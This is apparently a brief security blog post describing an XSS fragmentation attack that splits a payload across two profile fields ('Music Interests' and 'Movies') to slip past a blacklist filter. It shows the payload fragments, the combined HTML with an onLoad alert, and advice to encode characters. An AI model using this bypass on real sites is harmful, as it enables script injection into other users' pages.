RETURN $ecure;

kuza55 wrote a very good article on implementing fragmenation attacks with XSS.

At the simplest level, fragmentation attacks are possible when several fragments, which are by themselves not a security risk and can therefore be allowed to pass through a filter or firewall, but when the fragments reach their destination the fragments are combined and produce something dangerous.

The actual exploit is using <body foo=’  in your ”Music Interests” box for your profile.
It then puts everything splitting the Music and Film sections into the foo attribute. In the Movies section of your interests you put  ‘ onLoad=’alert(“xss”);> This turns out something like this.

<tr id=MusicRow><td valign=”top” align=”left” width=”100″ bgcolor=”#b1d0f0″><span class=”lightbluetext8″>Music</span></td><td id=”ProfileMusic” width=”175″ bgcolor=”#d5e8fb” style=”WORD-WRAP: break-word”>Music</span></td><td id=’ProfileMusic’ width=’175′ bgcolor=’#d5e8fb’ style=”WORD-WRAP: break-word”><body test=’</td></tr><script language=”JavaScript”>highlightInterests(“ProfileMusic”);</script><tr id=MoviesRow><td valign=”top” align=”left” width=”100″ bgcolor=”#b1d0f0″><span class=”lightbluetext8″>Movies</span></td><td id=”ProfileMovies” width=”175″ bgcolor=”#d5e8fb” style=”WORD-WRAP: break-word”>’ onLoad=’alert(“Salut?”);’></body></html></td></tr><script language=”JavaScript”>highlightInterests(“ProfileMovies”);</script>

As you can see, there are no single quotes between the two interest fields. Which makes the second field execute the event handler code. This is a prime example of why you should not do contextual blacklisting. This means, don’t be looking for completed html tags, proper formatting, etc. If I put a <style> tag in a field then use the javascript directive later in the page but still within the style, it will run, but if I use it in the same field, it will be blocked. Instead you should turn many non-alphanumeric characters into their HTML equivelants.

Live code. Uses Malucs CSRF of changing your Preferred language to french.